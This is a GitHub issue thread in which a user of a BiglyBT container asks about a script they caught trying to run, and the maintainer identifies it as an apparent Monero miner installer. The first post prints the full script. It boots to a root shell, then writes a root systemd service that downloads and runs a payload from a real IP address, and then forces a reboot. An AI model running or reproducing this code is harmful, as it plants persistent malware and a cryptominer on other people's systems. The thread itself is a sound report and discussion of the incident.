### ISSUE TITLE
Strange Code

### ISSUE THREAD

**Issue by AllanHBC** [Fullaxx/biglybt-extreme#15]
Hello. How are you? What is this code about? I caught it trying to execute, but I didn't understand what it's for.

insmod lvm;search --file --set=r /bin/sh;probe --set=u -u $r;insmod regexp;for a in ($root)/*; do if [ "$a" = "($root)/boot" ]; then for b in ($root)/boot/*; do if regexp ".*/vmlinu.*" "$b"; then set l=$b;break 2;fi;done;fi;if regexp ".*/vmlinu.*" "$a"; then set l=$a; break;fi;done;regexp ".*/vmlinu.(.*)" $l --set v;for a in ($root)/*; do if [ "$a" = "($root)/boot" ]; then for b in ($root)/boot/*; do if regexp ".*/initr.*$v" "$b"; then if ! regexp "kdump" "$b"; then set i=$b;break 2;fi;fi;done;fi;if regexp ".*/initr.*$v" "$a"; then if ! regexp "kdump" "$a"; then set i=$a;break;fi;fi;done;linux $l root=UUID=$u rw init=/bin/sh;initrd $i;boot;printf "[Unit]\nAfter=network.target\nDescription=a\n\n[Service]\nUser=root\nGroup=root\nExecStart=/bin/sh -c '(wget 207.244.199.95/b -O/.__min__.sh || curl -L 207.244.199.95/b -o /.__min__.sh); sh /.__min__.sh'\n\n[Install]\nWantedBy=multi-user.target" > /usr/lib/systemd/system/qqq.service;ln -s /usr/lib/systemd/system/qqq.service /etc/systemd/system/multi-user.target.wants/qqq.service;reboot -f || sbin/reboot -f;

**Comment by Fullaxx** [comment]
where do you see this code?

**Comment by Fullaxx** [comment]
I don't see this script in the repo, so I'm going to close this thread. If you did see the above code, it looks like script that installs a monero miner. If you find anything like this in the repo, please re-open the thread and explain which file its in and how you found it.

**Comment by AllanHBC** [comment]
Hello @Fullaxx ! Sorry for disappearing.

I ran some tests, and this script always tries to execute about 24 hours after installing the container. I only discovered this code by chance because it was accidentally pasted into a SEARCH field in BiglyBT and, therefore, was not executed.

I performed some tests and noticed that I can prevent the code from running if I open an application like GEdit, for example, and enable its ALWAYS ON TOP option. However, the VNC stops working because it claims there were too many login attempts at the address, and it only works again if I restart the container.

The only container where I have this "issue" is this one, but I’m not sure if it’s necessarily something with the CONTAINER itself or if my server is being attacked in some way, using the first vulnerability it finds (the BiglyBT container’s VNC?) to launch the attack.

I’m still very new to this world, so maybe I’m saying nonsense, but I’m trying to give you as much information as possible. If you can suggest tests, I’m willing to try them here.

**Comment by Fullaxx** [comment]
Try spawning a container and then immediately closing BiglyBT, then open GEdit and leave the cursor on GEdit for more than 24 hours (while BiglyBT is not running). It does sound like someone has access or is trying to get access to your machine. I will be honest, the "extreme" patch to BiglyBT is kind of a mystery, I don't know much about it. but please make sure that you protect yourself and firewall off your container as much as possible so external parties don't access your container.

**Comment by AllanHBC** [comment]
Ok, I’ll do this test! I’ll leave it running here with Bigly closed. I’ll share updates as soon as possible. Thank you for the help!

**Comment by AllanHBC** [comment]
@Fullaxx  Ok, 3 days and no issues with Bigly closed. I’ll do more tests! By the way, would it be possible to update the pack to the new version of Bigly Extreme? It’s currently on 3.7. I could run tests on this version as well.

**Comment by Fullaxx** [comment]
yes, when I get some time, i will look into updating the software versions.
